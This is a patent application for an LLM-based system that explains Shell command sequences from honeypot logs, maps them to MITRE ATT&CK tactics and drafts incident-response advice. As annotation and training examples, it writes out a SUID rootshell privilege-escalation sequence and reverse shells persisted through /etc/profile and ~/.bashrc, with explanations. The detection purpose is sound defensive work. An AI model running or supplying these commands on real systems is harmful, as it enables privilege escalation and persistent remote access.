A shell command line context modeling abnormal diagnosis method and system based on a large language model
Patent Information
- Application Number
- CN202610890957.0
- Authority / Receiving Office
- CN · China
- Patent Type
- Applications(China)
- Current Assignee / Owner
- Filing Date
- 2026-06-18
- Publication Date
- 2026-09-25
AI Technical Summary
[0009]本发明的目的在于解决现有技术存在的任务适配性不足、意图识别能力有限、处置建议生成能力薄弱及数据安全风险不可控的问题,并提出一种基于大语言模型的Shell命令行上下文建模异常诊断方法和系统
[0050]1、本发明以黄金标准集和扩展标注数据为基础,通过提示多样化与回复专业化构建本地化指令数据集,并利用该指令数据集对基础大语言模型进行领域自适应微调,使模型能够结合多条Shell命令的上下文关系输出统一、专业的自然语言解释,从而提高对复杂Shell命令序列的语义理解能力,并降低敏感数据外传风险。
Smart Images

Figure CN122818152A_ABST
Abstract
Description
Technical Field
[0001] This invention relates to network security and machine learning technologies, specifically to a method and system for anomaly diagnosis based on Shell command-line context modeling using a large language model. Background Technology
[0002] Cyberattacks have become a critical source of risk threatening the core assets of various organizations, posing continuous and multi-dimensional security challenges to their data resources, application systems, and core business facilities. Among these, attacks based on malicious shell commands (such as command injection attacks) are particularly prominent: attackers exploit vulnerabilities in application user input validation mechanisms to inject malicious shell commands, thereby illegally obtaining sensitive data, controlling target servers, or carrying out destructive operations. Therefore, accurate detection of malicious shell commands is a core element in ensuring cyberspace security.
[0003] For security operations personnel, manual auditing of shell commands in security logs is a crucial means of identifying malicious behavior and analyzing attack intent. However, malicious shell commands generally have characteristics such as complex syntax and strong concealment (e.g., code obfuscation, segmented execution), making it difficult for not only junior security analysts to accurately judge them, but also requiring senior security experts to spend a lot of time and resources, and prone to misjudgment and omission.
[0004] In recent years, the rapid evolution of Large Language Models (LLMs) has provided a new technological path for the cybersecurity field. These models, relying on massive parameter scales and deep neural network architectures, and pre-trained on large-scale general datasets, have demonstrated excellent capabilities in natural language understanding and programming language parsing. However, practice has shown that general-purpose large language models have significant limitations in the task of identifying malicious shell command intents, specifically in the following four aspects:
[0005] (1) Insufficient task adaptability: The general large language model is designed to cover a wide range of natural language processing (NLP) tasks. Its training dataset has not been specifically optimized for the syntax rules and semantic features of Shell commands. The model architecture also lacks targeted adaptation to professional domain knowledge of Shell commands, which makes it impossible to accurately analyze the semantic connotation and execution intention when faced with Shell commands with unique syntax and strong professionalism.
[0006] (2) Limited intent recognition capability: Shell commands are often closely related to specific operation processes, but existing security detection tools cannot effectively associate the shell command context environment. As a result, when security analysts use large language models to analyze alarm logs, the large language models cannot fully grasp the operation process of shell commands in the context of alarm logs. Consequently, the large language models cannot provide a satisfactory answer and identify the intent of malicious shell commands.
[0007] (3) Weak ability to generate disposal suggestions: Even if the general large language model can identify the attack intent of malicious shell commands, it cannot combine network security protection practices to generate actionable disposal strategies, making it difficult to form a closed-loop protection capability from detection to identification to disposal.
[0008] (4) Uncontrollable data security risks: Online large language model services need to transmit sensitive data such as alarm logs and Shell commands over the network. There is a risk of leakage in the data transmission and storage process, and the model memory mechanism may cause sensitive information to be retained. At the same time, it is difficult for enterprises to control the operation and compliance of service providers, and there is a risk of losing data sovereignty. On the other hand, locally deployed large language models can realize the "no-domain" processing of sensitive data, ensuring that enterprises control data sovereignty and meet compliance and regulatory requirements. Security mechanisms can also be customized based on business scenarios to reduce long-term operational risks and costs. Therefore, it is necessary to build a local large language model for malicious Shell command identification. Summary of the Invention
[0009] The purpose of this invention is to address the problems of insufficient task adaptability, limited intent recognition capability, weak ability to generate handling suggestions, and uncontrollable data security risks in existing technologies, and to propose a Shell command line context modeling anomaly diagnosis method and system based on a large language model.
[0010] To achieve the above objectives, the technical solution provided by this invention is as follows:
[0011] Firstly, a method for anomaly diagnosis based on Shell command-line context modeling using a large language model is proposed, including:
[0012] Obtain the Shell command session log, select high-risk sessions from the Shell command session log, and perform expert annotation on the high-risk sessions to obtain the gold standard set;
[0013] Based on the gold standard set, the remaining Shell command session logs are automatically annotated using a large language model to generate an extended annotated dataset.
[0014] By rewriting the gold standard set and extended annotation dataset using pre-defined diverse task instructions, an instruction dataset is obtained. Based on the instruction dataset, the large language model is subjected to domain-adaptive fine-tuning to obtain a dedicated large model.
[0015] The sequence of Shell commands to be diagnosed is input into a dedicated large model for contextual modeling, and the output is a natural language interpretation corresponding to the sequence of Shell commands.
[0016] A dynamic rule engine is built to calculate the similarity between natural language interpretations and preset ATT&CK structured rules, and to map attack intentions to corresponding ATT&CK tactical tags.
[0017] A structured experience knowledge base is constructed. Based on natural language interpretation and ATT&CK tactical tags, retrieval enhancement generation technology is used to match candidate knowledge fragments from the structured experience knowledge base and guide a dedicated large model to generate emergency response suggestions.
[0018] Furthermore, the process of automatically annotating the remaining Shell command session logs using a large language model, based on the gold standard set, to generate an extended annotated dataset includes:
[0019] Construct a prompt word template that includes role instructions, input content, and output requirements. Load the prompt word template as a priori example using the gold standard set and input it into a large language model. Use the large language model to mimic the analysis logic in the gold standard set to generate command explanation fields and overall intent summary fields for each remaining Shell command session log, thus obtaining an extended labeled dataset.
[0020] Furthermore, the step of rewriting the gold standard set and extended annotation dataset using preset diverse task instructions to obtain an instruction dataset includes:
[0021] For each Shell command sequence in the gold standard set and extended labeled dataset, multiple task instructions are constructed based on preset question dimensions;
[0022] Randomly select at least one task instruction from multiple task instructions, combine it with a Shell command sequence, and generate a prompt in the instruction dataset;
[0023] The command interpretation field and overall intent summary field corresponding to the Shell command sequence in the extended annotation dataset are used as the response end in the instruction dataset;
[0024] Construct instruction pairs consisting of multiple prompting ends and corresponding response ends to obtain an instruction dataset.
[0025] Furthermore, the neighborhood adaptive fine-tuning employs the LoRA low-rank adaptive algorithm.
[0026] Furthermore, the construction of a dynamic rule engine, which calculates the similarity between natural language interpretations and preset ATT&CK structured rules, maps attack intents to corresponding ATT&CK tactical tags, includes:
[0027] Based on the MITRE ATT&CK attack tactics knowledge framework, the descriptive features of each ATT&CK technique are extracted and transformed into structured rules;
[0028] The natural language interpretation is segmented and stop word filtered to extract command word units;
[0029] Each structured rule is segmented and deduplicated to extract rule word units;
[0030] Command word units and rule word units are vectorized, and the cosine similarity between them is calculated to obtain the word-level score of each command word unit.
[0031] Based on the pre-set matching logic in the structured rules, the word-level scores are logically verified to determine whether the natural language interpretation matches the current structured rules.
[0032] For structured rules that are determined to be a match, calculate the average of the word-level scores of each command word unit participating in the logical verification, use it as the confidence level of the current structured rule, and output the ATT&CK tactical label corresponding to the structured rule with the highest confidence level.
[0033] Furthermore, the construction of a structured experience knowledge base, based on natural language interpretation and ATT&CK tactical tags, utilizes retrieval enhancement generation technology to match candidate knowledge fragments from the structured experience knowledge base, and guides a dedicated large model to generate emergency response suggestions, including:
[0034] The publicly available data sources are structured and transformed to construct preprocessed knowledge units;
[0035] Each pre-trained semantic representation model is used to transform each pre-processed knowledge unit into a high-dimensional semantic vector, which is then stored in a vector database to establish an index, while preserving the one-to-one correspondence between the high-dimensional semantic vector and the original knowledge unit text.
[0036] The natural language interpretations are preprocessed, and the semantic representation model is used to transform each preprocessed natural language interpretation into a query semantic vector;
[0037] Original knowledge unit texts whose semantic vector cosine similarity meets preset conditions are matched and queried from the vector database and used as candidate knowledge fragments.
[0038] Based on candidate knowledge fragments, natural language interpretations, and corresponding ATT&CK tactical tags, a four-dimensional prompt word is constructed, which includes task instructions, core inputs, knowledge support, and output requirements. This prompt word is then input into a dedicated large model to generate preliminary emergency response suggestions.
[0039] The initial emergency response recommendations are verified for completeness, standardized in procedure, and unified in terminology, and then the final emergency response recommendations are output.
[0040] Furthermore, the step of structurally transforming the public data source to construct preprocessed knowledge units includes:
[0041] Extract text from the public data source to obtain the public data source text;
[0042] Extract the core elements of text from public data sources, construct domain-specific splitting rules based on regular expressions, set splitting boundaries with core elements as anchor points, and perform structured splitting of text from public data sources.
[0043] The split text fragments are filtered, and fragments containing complete emergency response logic are retained as knowledge units;
[0044] The knowledge units are segmented, stop words are removed, and synonyms are normalized to obtain preprocessed knowledge units.
[0045] Secondly, a Shell command-line context modeling anomaly diagnosis system based on a large language model is proposed, including:
[0046] The Shell command interpretation module is used to acquire Shell command session logs, select high-risk sessions from the logs, and perform expert annotation on these high-risk sessions to obtain a gold standard set. Based on the gold standard set, the remaining Shell command session logs are automatically annotated using a large language model to generate an extended annotation dataset. The gold standard set and the extended annotation dataset are rewritten using preset diverse task instructions to obtain an instruction dataset. Based on the instruction dataset, the large language model is subjected to domain-adaptive fine-tuning to obtain a dedicated large model. The Shell command sequence to be diagnosed is input into the dedicated large model for contextual modeling, and the corresponding natural language interpretation is output.
[0047] The intent recognition module is used to build a dynamic rule engine, calculate the similarity between natural language interpretation and preset ATT&CK structured rules, and map the attack intent to the corresponding ATT&CK tactical tags.
[0048] The repair suggestion module is used to build a structured experience knowledge base. Based on natural language interpretation and ATT&CK tactical tags, it uses retrieval enhancement generation technology to match candidate knowledge fragments from the structured experience knowledge base and guides a dedicated large model to generate emergency response suggestions.
[0049] Compared with the prior art, the significant advantages of this invention are:
[0050] 1. Based on the gold standard set and extended labeled data, this invention constructs a localized instruction dataset by diversifying prompts and specializing responses. This instruction dataset is then used to perform domain-adaptive fine-tuning on the basic large language model, enabling the model to output unified and professional natural language interpretations by combining the contextual relationships of multiple Shell commands. This improves the semantic understanding of complex Shell command sequences and reduces the risk of sensitive data being leaked.
[0051] 2. This invention constructs structured rules based on the MITRE ATT&CK attack tactics knowledge framework, and realizes interpretable mapping from natural language interpretation to ATT&CK tactical labels through vector similarity calculation and matching logic verification, thereby improving the accuracy and transparency of attack intent identification.
[0052] 3. This invention combines structured knowledge base, vector retrieval, and emergency response suggestion generation, which can generate step-by-step, actionable handling suggestions from candidate knowledge fragments most relevant to the current scenario, thereby improving the standardization and operability of emergency response. Attached Figure Description
[0053] Figure 1 This is a flowchart of an anomaly diagnosis method for Shell command line context modeling based on a large language model according to the present invention;
[0054] Figure 2 This is a framework diagram of a Shell command-line context modeling anomaly diagnosis system based on a large language model, according to the present invention. Detailed Implementation
[0055] To make the objectives, technical solutions, and advantages of this invention clearer, the invention will be further described in detail below with reference to the accompanying drawings and embodiments. It should be understood that the specific embodiments described herein are merely illustrative and not intended to limit the invention.
[0056] Example 1:
[0057] like Figure 1 As shown, the present invention provides a method for diagnosing anomalies in Shell command-line context modeling based on a large language model, which specifically includes the following steps:
[0058] Step 1: Conduct domain-adaptive suggestion engineering using a basic large language model, and generate an extended labeled dataset based on the gold standard set of expert annotations; in one embodiment, the basic large language model can be GPT-4.
[0059] To ensure the authenticity and professionalism of the training data, this invention collected 3265 real Shell command session logs from a high-interaction honeypot deployed for two years as the raw attack corpus. Based on this, fine-grained semantic annotation was performed on 360 high-risk sessions, accurately parsing the operational semantics of individual commands to obtain a gold standard set. The core selection criteria for high-risk sessions are as follows:
[0060] ① Attack Target and Intent Dimension: The session contains explicit attack commands targeting core system components, and the attack intent has destructive, control-stealing, or data-stealing attributes. Specific examples include, but are not limited to, attempting to modify core system configuration files (such as modifying permission configuration files like / etc / passwd and / etc / sudoers in Linux operating systems), tampering with the running parameters of critical system services (such as SSH, Secure Shell, FTP, File Transfer Protocol), implanting malicious backdoor programs (such as reverse shell scripts, rootkits, root packages, etc.), and attempting to clear system logs to cover up attack traces. If the session contains multiple commands forming a complete attack chain of "privilege escalation - control acquisition - destruction / theft," it is directly identified as a high-risk session.
[0061] ② Privilege Escalation Behavior Dimension: The session contains explicit privilege escalation operations with a high success rate or actual privilege escalation consequences. These include using exploit tools (such as Dirty COW, a classic privilege escalation vulnerability, and corresponding exploit scripts), attempting to log in to high-privilege accounts (such as root or Administrator accounts) using weak system passwords, abusing SUID (Set User ID) / SGID (Set Group ID) files to gain high privileges, and using scheduled tasks (Cron; Task Scheduler) to execute high-privilege commands. Verification through the honeypot's built-in privilege monitoring module shows that if the attacker successfully escalates from ordinary user privileges to administrator / root privileges during the session, it is directly included in the high-risk session category.
[0062] ③ Attack complexity dimension: Attack methods in the session exhibit characteristics of coordination, concealment, or tool-based features, distinguishing them from low-risk attacks such as routine scanning and probing. Specifically, attackers use a combination of multiple attack tools (such as a combination of port scanning tools, vulnerability scanning tools, vulnerability exploitation tools, and malicious code injection tools), employ encrypted communication methods (such as transmitting attack payloads through SSL (Secure Sockets Layer) tunnels) to evade detection, use custom attack scripts or new attack tools (non-publicly available tools), and reduce the probability of being identified by executing commands in segments (breaking malicious commands into multiple fragments for execution). Such attack methods are usually initiated by attackers with certain technical capabilities, and the attack harm and success probability are significantly higher than low-risk attacks, thus classifying them as high-risk sessions.
[0063] ④ Attack Consequences and Impacts: Based on the damage assessment of the honeypot simulation system, the session attack has caused or is highly likely to cause serious system damage, including paralysis of core system functions (such as deleting critical system directories or formatting storage partitions via commands), leakage of sensitive information (such as batch reading of server configuration files, database account passwords, and user privacy data and attempting to send them out), and formation of botnet nodes (such as DDoS attack agents). For sessions that have not directly caused damage but whose attack paths clearly point to serious harm (such as malicious code that has been uploaded but not yet executed), combined with the historical harm records of the attack tools, they are determined to be high-risk sessions after review by security experts.
[0064] Then, based on the gold standard set of expert annotations and using a basic large language model, an extended annotated dataset is generated through adaptive prompting engineering using prompt word templates. In one embodiment, the basic large language model can be GPT-4. An example of a prompt word template is provided in this embodiment as follows:
[0065] "### Command"
[0066] You are a professional network security analysis assistant. Please strictly follow the requirements below to analyze the input Linux command sequence.
[0067] ### Input
[0068] {command_sequence}
[0069] ### Output Requirements
[0070] 1. Generate a complete JSON object containing two fields:
[0071] - "input": Directly copy the original input content.
[0072] - "output": An object containing two subfields
[0073] 2. Output field structure:
[0074] - "cot": An array that interprets each command sequentially.
[0075] * Numbered according to execution order (starting from 1)
[0076] * Format for each item: "[Serial Number]. Explanation Content"
[0077] * The explanation must include: command function + key parameters + security risks.
[0078] - "summary": A string summarizing the overall content.
[0079] * All cot interpretation points must be associated.
[0080] * Reveal the overall intent of the command sequence
[0081] * Highlight key behavioral patterns and technical characteristics. Here, cot is the command explanation field, and summary is the overall intent summary field.
[0082] In this way, an expanded labeled dataset containing 2905 samples was finally constructed.
[0083] To clarify the output specifications for fine-grained semantic annotation, the following selects typical Shell command sequences from high-risk sessions and outputs the annotation results according to a specified template. The annotation focuses on the command execution logic, the role of key parameters, security risks, and the overall attack intent, achieving accurate semantic parsing. A specific example is shown below:
[0084] Example 1: SUID privilege abuse, privilege escalation command sequence.
[0085] Original command sequence: cp / bin / bash / tmp / rootshell; chmod u+s / tmp / rootshell
[0086] Annotate the output field:
[0087] -“cot”:[
[0088] "1. Executing the `cp` command copies the system's core bash program ( / bin / bash) to the ` / tmp` directory and names it 'rootshell'. No special parameters are required. The core risk is creating a controllable copy of the system shell, paving the way for subsequent privilege manipulation."
[0089] "2. Execute the chmod command. The key parameter u+s adds SUID permissions to the / tmp / rootshell file. This allows the file to inherit the owner's (usually root) permissions when executed. The core risk is that attackers can use this file to bypass the current permission restrictions and gain high-privilege operations."
[0090] - "summary": "This command sequence creates a shell file with high-privilege execution capabilities by copying the system bash program and configuring SUID permissions. The overall intent is to achieve privilege escalation. The core behavior pattern is the abuse of SUID privilege features. The technical characteristics are manifested in the use of basic system commands to complete the exploit of privilege vulnerabilities. Ultimately, it can enable attackers to obtain root-level operation privileges from ordinary user privileges, posing a serious threat to system security."
[0091] Example 2: Persistent reverse shell backdoor command sequence.
[0092] Original command sequence: `echo " / bin / bash -i > / dev / tcp / 192.168.1.100 / 8888 0>&1 2>&1" >> / etc / profile; source / etc / profile`
[0093] Annotate the output field:
[0094] -“cot”:[
[0095] "1. Executing the `echo` command writes the reverse shell command to the system's global configuration file ` / etc / profile`. The key parameter `>>` indicates appending (to avoid overwriting existing configurations). The core risk is the persistent implantation of backdoor commands, which will be automatically executed upon subsequent system restarts or new user logins. Within the reverse shell command, ` / bin / bash -i` starts an interactive bash, `> / dev / tcp / 192.168.1.100 / 8888` redirects input and output to the attacker's IP (192.168.1.100) and port (8888), and `0>&1` and `2>&1` synchronize standard input, error output, and standard output, achieving complete interaction."
[0096] "2. Executing the `source` command immediately loads the ` / etc / profile` configuration file, triggering a reverse shell without requiring a system restart. It has no special parameters. The core risk is that it shortens the attack's effective time, allowing attackers to quickly gain control of the target host."
[0097] - "summary": "This command sequence achieves persistent backdoor implantation and rapid control acquisition by appending and writing reverse shell commands to the system's global configuration file and loading them in real time. The overall intention is to establish a long-term and stable control channel. The core behavior pattern is to use the system login initialization configuration to achieve backdoor persistence. The technical characteristics are reflected in the combination of redirection technology to build a reverse shell and the use of the source command to accelerate the attack. This allows attackers to control the target host for a long time and is difficult to detect by routine investigations."
[0098] Step 2: Store the extended labeled dataset locally, and perform local domain adaptive LoRA fine-tuning on the basic large language model based on the instruction dataset constructed from the gold standard set and the extended labeled data.
[0099] The extended labeled data generated in step 1, together with the gold standard set, constitutes the basic sample set for constructing instruction data. For each basic sample, a prompt end is first generated based on the preset task instructions, and then the corresponding command interpretation field and overall intent summary field are organized into a response end, thus forming an instruction data sample composed of <prompt end, response end>. If we decompose it from the model training input format, the prompt end can be further represented as a combination of task instructions and Shell command sequence inputs, and the response end is the model's target output. Therefore, "<prompt end, response end>" and "instruction, input, output" are two expressions of the same training sample, where the former serves as the dataset organization form, and the latter as the field division during training. This method achieves diversified prompts and specialized responses.
[0100] The reason for proposing diverse prompts is that when users request the large language model to interpret Shell commands, their questioning methods exhibit significant diversity, mainly reflected in the user's background and knowledge level, the granularity of information needs, the form of expression, and the core motivation. Furthermore, actual questions often possess a certain degree of ambiguity and context dependence. To adapt the model to the questioning habits of different users, this invention rewrites the prompting interface through diversified data augmentation and standardization strategies before fine-tuning the large language model, and constrains the samples with a unified response output specification, forming a command dataset suitable for fine-tuning training.
[0101] For example, the "diversification of the same command" referred to in this invention means generating multiple prompt templates with differentiated features for the same Shell command or command sequence by simulating the questioning habits of different users, with the number of templates preferably not less than five. The core logic is that even if the semantics of the command itself are fixed, users' questioning angles, expressions, and key needs still differ significantly; by constructing multi-dimensional prompt templates for the same command sequence, the model can learn the mapping relationship of "the same semantics corresponding to multiple questioning forms" during training, thereby responding more accurately to various explanation requests in practical applications. For example, for the following typical high-risk command "echo 'bash -i >& / dev / tcp / 203.0.113.10 / 443 0>&1' >> ~ / .bashrc" (reverse shell persistence command), the same command can be diversified through the following five prompt templates:
[0102] ① "Explanation of command: echo 'bash -i >& / dev / tcp / 203.0.113.10 / 443 0>&1' >> ~ / .bashrc".
[0103] ② "What is the purpose of appending a command to ~ / .bashrc? The command is bash -i >& / dev / tcp / 203.0.113.10 / 443 0>&1."
[0104] ③ What do >>, >&, and 0>&1 mean in this command? What is the overall execution flow? echo 'bash-i >& / dev / tcp / 203.0.113.10 / 443 0>&1' >> ~ / .bashrc.
[0105] ④ "It was discovered that someone executed this command on the server. Is this a malicious attack? What risks might it pose? How can we defend against it?"
[0106] ⑤ "What happens every time you log in after executing this command on a Linux system? echo 'bash -i >& / dev / tcp / 203.0.113.10 / 443 0>&1' >> ~ / .bashrc".
[0107] Table 1: Examples of Diverse Implementation Methods for Hints
[0108]
[0109] The professionalized response section is jointly provided by the manual annotation results from professional cybersecurity experts in Step 1 and the automated annotation results obtained from the large model's self-instruction learning. Furthermore, the final instruction dataset used for fine-tuning includes samples from the gold standard set that have been rewritten with diverse prompts, and samples from the extended annotation dataset that have also been rewritten with diverse prompts. Each sample's response includes a command explanation field and an overall intent summary field to ensure consistent output. Examples of specific implementation methods for prompt diversity are shown in Table 1.
[0110] After constructing the instruction dataset, the basic large language model is trained using the LoRA fine-tuning algorithm for domain adaptation. In one embodiment, the following training parameters can be used: Learning Rate = 5e-5, Epochs = 10, Batch Size = 8, Low-Rank Dimension lora_rank = 8, Scaling Factor lora_alpha = 16, Target Modules = ["q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj"], and Dropout Rate lora_dropout = 0.05. With these settings, the model can be quickly adapted to Shell command interpretation tasks without significantly increasing the number of model parameters. Its output simultaneously covers the function of a single command, the semantics of key parameters, potential security risks, and the overall behavioral pattern of the command sequence, providing a unified input for subsequent attack intent identification.
[0111] Step 3: Construct a dynamic rule engine to map the natural language interpretation generated by the dedicated large model to the ATT&CK attack tactics knowledge framework for attack intent identification.
[0112] This paper proposes an ATT&CK mapping framework based on a dynamic rule engine. The module first receives natural language interpretations and overall behavioral summaries of shell command sequences generated by the shell command interpretation module. Then, it uses Natural Language Processing (NLP) technology to perform in-depth analysis of the interpretation results and extract key behavioral features. These key behavioral features are then aligned with the tactical and technical descriptions in the MITRE ATT&CK attack tactics knowledge framework, thereby automatically mapping complex attack behavior patterns to specific ATT&CK tactical tags to help analysts more clearly identify the behavioral intent of malicious shell commands.
[0113] Rule-making phase: A structured rule set is constructed based on the publicly available tactical and technical descriptions in the MITRE ATT&CK attack tactics knowledge framework. The ATT&CK matrix organizes the attack lifecycle stages by tactic, with each tactic containing multiple techniques. Techniques describe specific attack methods, and tactics characterize the attack stage to which that technique belongs. Let the ATT&CK technique set be A = {A1, A2, ..., A...} n The structured rule set corresponding to it is denoted as R={R1,R2,...,R}. n}, where the q-th ATT&CK technology A q The corresponding structured rules are denoted as R. q =[id,tactic,Kc,Kr,Kp]. Where id is the technique ID in the ATT&CK matrix, tactic is the tactical stage to which the technique belongs (tactical tag mapping is completed by reading the tactic field after matching the corresponding rules), Kc=[kc1,...,kc5] represents the action keyword set, used to describe the keywords or phrases required to trigger the technique, Kr=[kr1,kr2] represents the tool feature set, used to further confirm the specific tools and parameters used after the rule is triggered, and Kp represents the path pattern regular expression, used to describe the file path or directory pattern related to the technique; for example, T1059 can correspond to the keyword set ["execute","run"].
[0114] Rule matching phase: The rule matching process first completes initialization, including loading the structured rule set and preloading pattern vectors as needed. Then, word segmentation and stop word filtering are performed on the input natural language interpretation to extract command word units. Next, for each structured rule in the structured rule set, its pattern text is segmented and deduplicated to generate a list of rule word units. Then, using a vector encoding caching mechanism, the command word units and rule word units are converted into vector representations respectively, a similarity matrix is constructed, and the maximum similarity between each command word unit and the rule word vector is extracted as the word-level score for that command word unit. Next, a match is determined based on the pre-set matching logic constraints and thresholds in the structured rules. If a match is found, the average of the maximum similarities of each command word unit is used as the confidence level, and the rule information and confidence level are retained. Finally, all matched structured rules are sorted in descending order of confidence level, and the ATT&CK tactical tag with the highest confidence level is returned. The specific flow of this matching algorithm is shown below.
[0115] ① Word segmentation: The input natural language interpretation is segmented into word units, converting continuous text into discrete command word units C={c1,c2,...,c m}, where c mThis represents the m-th command word unit, where m represents the number of command word units. Irrelevant words are filtered using a domain-adaptive stop word list. The command word unit is the smallest semantic processing unit obtained after word segmentation, used for subsequent semantic analysis and vectorized representation.
[0116] ② Rule Vector Preparation: Each technology mapping rule in the structured rule base undergoes the same word segmentation and deduplication processing to construct a unified behavioral feature vocabulary. Further, the command word units C obtained in step ① are encoded into a command word vector set W={w1,w2,...,w...} m}, where w m Let $m$ represent the word vector of the m-th command. Simultaneously, the keyword set $Kc$ and tool feature set $Kr$ in each structured rule are encoded into a rule word vector set $P = {p1, p2, ..., p$ after word segmentation and deduplication. n}, where p n This represents the nth rule word vector, where n represents the number of rule word vectors. During the vectorization phase, the system loads or constructs pattern vector representations through a three-level caching mechanism, namely, sequentially querying the memory cache, disk cache, and pre-trained model encoding results, to reduce redundant computation overhead and improve system response speed.
[0117] ③ Similarity Calculation: Perform batch cosine similarity calculation between the command word vector set W generated in step ② and the rule word vector set P, as shown in the following formula:
[0118]
[0119] in, Let S be the cosine similarity matrix, where m represents the number of command word units obtained after word segmentation of the input natural language interpretation, n represents the number of regular word vectors, and S is the number of regular word vectors. ij w represents the vector of the i-th command word. i With the j-th rule word vector p j The cosine semantic similarity between the command word units is calculated by taking the maximum cosine similarity between the command word unit and all regular word vectors as the word-level score for that command word unit.
[0120]
[0121] in, This represents the word-level score of the i-th command word unit.
[0122] This strategy captures the optimal match between each command word unit and the rule pattern, enhancing robustness to synonymous expressions.
[0123] ④ Logical verification: The logical verification stage determines whether a match is successful based on predefined matching rules. For the "all" rule, all word-level scores must reach the threshold; for the "any(x,y)" rule, at least x of the first y word-level scores must reach the threshold.
[0124] ⑤ Confidence Calculation: Validated rules proceed to the confidence calculation stage. The average word-level score is used as the overall matching confidence, and the matching results are stored. The relevant calculation formula is shown below:
[0125]
[0126] in, The word_score represents the overall matching confidence score after logical verification. v denoted by , where represents the word-level score of the v-th command word unit, and u represents the number of command word units involved in the word-level score calculation.
[0127] Finally, the system sorts all matching results in descending order of confidence. A matching result refers to a structured result item formed after a structured rule has completed similarity calculation, logical verification, and confidence calculation. Each matching result includes at least a technology ID (id), technology name, tactical stage, and overall matching confidence. The matching result with the highest confidence is selected as the attack intent identification result, and the tactic field in that matching result is read as the corresponding ATT&CK tactical label. If multiple results have the same score, multiple candidate tactical labels and their associated technology IDs are returned for further confirmation in security analysis.
[0128] Step 4: Construct an external experience knowledge base and enhance generation technology through knowledge retrieval, so that a dedicated large model can generate corresponding emergency response suggestions based on the natural language interpretation of the current malicious shell command.
[0129] In the knowledge base construction phase, the knowledge base construction is the foundation for the remediation suggestion module to play its role. Its core goal is to transform the scattered and unstructured security vendor incident response manuals into structured knowledge resources that can be efficiently retrieved and accurately matched. The overall process covers four key steps: data source screening, text preprocessing, knowledge vectorization, and vector library deployment.
[0130] In the data source screening stage, emergency response manuals officially released by mainstream security vendors such as Qi An Xin, Sangfor, and NSFOCUS are preferentially selected as core data sources. Such data sources have three core advantages: first, authority. The content of the manuals is verified by the vendors' security experts, and the descriptions of emergency response procedures, risk avoidance points, etc. are recognized by the industry; second, practical operability. The content is mostly developed around real security incident scenarios, and explicitly includes implementable guidance information such as disposal tool selection and command operation details; third, scenario comprehensiveness. It covers various common attack scenarios such as malicious code attacks, data leakage, and system intrusion, and can match the emergency requirements corresponding to different types of Shell command sequences. At the same time, a data source access and update mechanism is established to regularly synchronize the latest versions of manuals from various vendors, so as to avoid the problem of invalid emergency suggestions caused by knowledge lag.
[0131] The text preprocessing link focuses on realizing the structured conversion of unstructured text, which is specifically divided into three steps: The first step is text extraction. A PDF parsing tool (such as PyPDF2) combined with OCR technology is used to accurately extract the text content in the manual, and irrelevant information such as headers, footers and advertising content is removed to obtain public data source text. The second step is structured splitting. The core of this link is to deconstruct continuous text into knowledge units with independent semantics and uniform granularity based on the knowledge logic in the emergency response field. The specific implementation path is as follows: First, rely on natural language processing (NLP) technology to identify domain keywords, and extract core elements strongly related to emergency response in the text (including attack behavior description, disposal operations, involved tools, tactical phase related information, etc.); second, construct domain-specific splitting rules based on regular expressions, set splitting boundaries with the core elements as anchor points, and perform structured splitting on the public data source text. For example, domain characteristic words such as "disposal steps", "protection measures", and "risk warning" are used as clause identifiers, and combined with punctuation marks (such as semicolons, periods) and paragraph structure to avoid semantic fragmentation of knowledge units after splitting. Finally, the split text fragments are screened, and fragments containing complete emergency response logic (such as "problem description - disposal plan", "risk characteristics - countermeasures") are retained as the final knowledge units, ensuring that each unit focuses on a single scenario or independent operation point, which not only avoids the interference of redundant information, but also ensures the integrity of knowledge. The third step is noise cleaning (preprocessing). Word segmentation, stop word removal (such as words without actual semantics like "的", "及", "用于" in the original text) and synonym normalization (such as unifying "恶意程序" and "恶意代码" into "恶意代码") are performed on the split knowledge units to enhance the identifiability of core semantic information, and obtain preprocessed knowledge units.
[0132] Knowledge vectorization and vector database deployment are key to achieving efficient retrieval. A Sentence-BERT pre-trained semantic representation model is employed to transform each preprocessed knowledge unit into a fixed-dimensional high-dimensional semantic vector. Simultaneously, the original knowledge unit text and its metadata mapping relationship are preserved for each high-dimensional semantic vector. Subsequently, the encoded semantic vectors are batch-stored into the Milvus vector database, and an IVF_FLAT index structure is constructed based on the attack type and scene similarity of the knowledge unit to shorten the response time of vector retrieval.
[0133] In the query generation stage: the natural language interpretation of the Shell command sequence output by the large model is used as the core input (e.g., "This command is used to download and execute a suspicious script from a remote server"). In the semantic matching stage, the input interpretation text is first preprocessed in the same way as in the knowledge base construction stage (word segmentation, stop word removal, etc.), and then it is transformed into a query semantic vector through the same Sentence-BERT model. Subsequently, the cosine similarity matching algorithm is used to calculate the similarity value between the query semantic vector and all high-dimensional semantic vectors in the vector database, quantifying the degree of semantic association between the two.
[0134] After the retrieval is completed, the original knowledge unit texts corresponding one-to-one with the candidate high-dimensional semantic vectors are first retrieved based on the vector retrieval results, serving as candidate knowledge fragments. Then, the candidate knowledge fragments, the natural language interpretation text of the Shell command sequence, and the corresponding ATT&CK tactical phase information are structurally integrated to construct a four-dimensional prompt word containing "task instructions, core inputs, knowledge support, and output requirements." Specifically, the task instructions are used to explicitly generate emergency response suggestions adapted to the current scenario; the core inputs are used to embed the interpretation text and tactical phase information; the knowledge support is used to introduce candidate knowledge fragments; and the output requirements constrain the suggestions to include at least five categories of content: emergency blocking measures, system investigation steps, tool selection, risk avoidance key points, and subsequent reinforcement solutions. Subsequently, the constructed prompt word is input into a dedicated large-scale model to generate preliminary emergency response suggestions. Then, based on the output requirements, the preliminary emergency response suggestions undergo completeness verification, step rearrangement, terminology standardization, and necessary subsequent reinforcement supplementation to output the final emergency response suggestions.
[0135] Example 2:
[0136] like Figure 2 As shown, this embodiment provides a Shell command-line context modeling anomaly diagnosis system based on a large language model, including:
[0137] The Shell command interpretation module uses a dedicated large language model, finely trained based on a constructed command dataset, to perform line-by-line parsing of the input Shell command sequence. Based on this, through aggregation analysis and correlation judgment of individual command lines as features, it outputs a natural language interpretation and overall behavior summary of the command sequence.
[0138] The intent recognition module first extracts the natural language description features of each tactic and technique from the MITRE ATT&CK attack tactics knowledge framework and transforms them into structured rules, breaking down complex semantic understanding into quantifiable behavioral feature tuples. Relying on a dynamic rule engine, this module efficiently maps the natural language parsing results generated by the Shell command interpretation module to ATT&CK tactical tags, thereby locating the attacker's overall action strategy and high-level action direction to achieve a specific goal from a macro perspective.
